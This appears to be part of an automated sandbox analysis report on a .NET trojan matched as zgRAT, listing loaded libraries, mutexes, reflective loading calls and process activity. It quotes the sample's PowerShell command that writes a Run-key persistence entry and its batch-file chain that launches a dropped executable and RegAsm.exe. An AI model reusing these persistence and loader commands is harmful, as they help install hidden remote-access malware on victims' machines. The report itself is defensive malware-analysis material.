                  Source: 57lklPjdPc.exe, 00000003.00000002.2011287729.000000000109E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000003.00000002.2012521370.0000000002D61000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000003.00000002.2014498959.0000000005330000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000007.00000002.2091314301.0000000002B29000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe, 00000007.00000002.2091972785.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTzeqis.dll" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exeBinary or memory string: OriginalFilenameAlkuhercfw.exe" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exe.0.drBinary or memory string: OriginalFilenameAlkuhercfw.exe" vs 57lklPjdPc.exe
                  Source: 57lklPjdPc.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: 0.2.57lklPjdPc.exe.443c110.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.57lklPjdPc.exe.457c130.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.57lklPjdPc.exe.443c110.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.57lklPjdPc.exe.6e40000.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.57lklPjdPc.exe.6e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 0.2.57lklPjdPc.exe.457c130.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 00000000.00000002.4219277118.0000000006E40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                  Source: 57lklPjdPc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: l6E.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 57lklPjdPc.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 57lklPjdPc.exe, Token.csCryptographic APIs: 'CreateDecryptor'
                  Source: 57lklPjdPc.exe, Token.csCryptographic APIs: 'CreateDecryptor'
                  Source: 57lklPjdPc.exe, InfoBaseConnector.csCryptographic APIs: 'CreateDecryptor'
                  Source: 57lklPjdPc.exe.0.dr, Token.csCryptographic APIs: 'CreateDecryptor'
                  Source: 57lklPjdPc.exe.0.dr, Token.csCryptographic APIs: 'CreateDecryptor'
                  Source: 57lklPjdPc.exe.0.dr, InfoBaseConnector.csCryptographic APIs: 'CreateDecryptor'
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@20/16@2/2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_00438710 CoCreateInstance,14_2_00438710
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile created: C:\Users\user\AppData\Roaming\57lklPjdPc.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeMutant created: \Sessions\1\BaseNamedObjects\aacf40c518
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7516:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2124
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7216:120:WilError_03
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile created: C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.batJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat" "
                  Source: 57lklPjdPc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 57lklPjdPc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: 57lklPjdPc.exeReversingLabs: Detection: 57%
                  Source: 57lklPjdPc.exeVirustotal: Detection: 61%
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile read: C:\Users\user\Desktop\57lklPjdPc.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\57lklPjdPc.exe "C:\Users\user\Desktop\57lklPjdPc.exe"
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\57lklPjdPc.exe "C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\57lklPjdPc.exe "C:\Users\user\AppData\Roaming\57lklPjdPc.exe"
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe"
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2124 -s 1736
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\XgrafwGYiYyF.bat" "Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001Jump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\l6E.exe "C:\Users\user\AppData\Roaming\l6E.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\57lklPjdPc.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dllJump to behavior
                  Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\PING.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\l6E.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: 57lklPjdPc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: 57lklPjdPc.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  Source: 57lklPjdPc.exe, Token.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 57lklPjdPc.exe.0.dr, Token.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  Source: 57lklPjdPc.exe, InfoBaseConnector.cs.Net Code: AssetEvent System.AppDomain.Load(byte[])
                  Source: 57lklPjdPc.exe.0.dr, InfoBaseConnector.cs.Net Code: AssetEvent System.AppDomain.Load(byte[])
                  Source: C:\Users\user\Desktop\57lklPjdPc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name '57lklPjdPc' -Value '"C:\Users\user\AppData\Roaming\57lklPjdPc.exe"' -PropertyType 'String'
